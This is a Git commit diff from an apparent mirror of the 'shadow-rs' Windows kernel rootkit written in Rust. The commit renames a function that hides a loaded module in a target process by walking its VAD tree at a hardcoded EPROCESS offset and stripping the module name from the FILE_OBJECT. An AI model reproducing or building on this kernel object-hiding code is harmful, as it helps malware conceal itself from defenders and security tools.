aljaz/shadow-rs
1
1
Fork 0
mirror of https://github.com/joaoviictorti/shadow-rs.git synced 2026-01-07 09:35:10 +01:00
Code Issues Packages Projects Releases Wiki Activity

Renaming structure to Hide Object

Browse Source
This commit is contained in:
João Victor
2024-09-07 23:40:11 -03:00
parent adebcdbbee
commit 4828108358
1 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
driver/src/module/mod.rs
View File

@@ -190,13 +190,13 @@ impl Module {
KeUnstackDetachProcess(&mut apc_state);
if !address.is_null() {
Self::hide_vad(address as u64, target);
Self::hide_object(address as u64, target);
}
Ok(())
}
/// Hides a VAD (Virtual Address Descriptor) in the target process.
/// Removing the module name in the FILE_OBJECT structure.
///
/// # Parameters
/// - `target_address`: The address of the module to hide.
@@ -205,7 +205,7 @@ impl Module {
/// # Returns
/// - `NTSTATUS`: Returns `STATUS_SUCCESS` if the VAD is successfully hidden, otherwise returns an appropriate error status.
///
pub unsafe fn hide_vad(target_address: u64, target_eprocess: Process) -> Result<(), NTSTATUS> {
pub unsafe fn hide_object(target_address: u64, target_eprocess: Process) -> Result<(), NTSTATUS> {
let vad_root = 0x7d8;
let vad_table = target_eprocess.e_process.cast::<u8>().offset(vad_root) as *mut RTL_BALANCED_NODE;
let current_node = vad_table;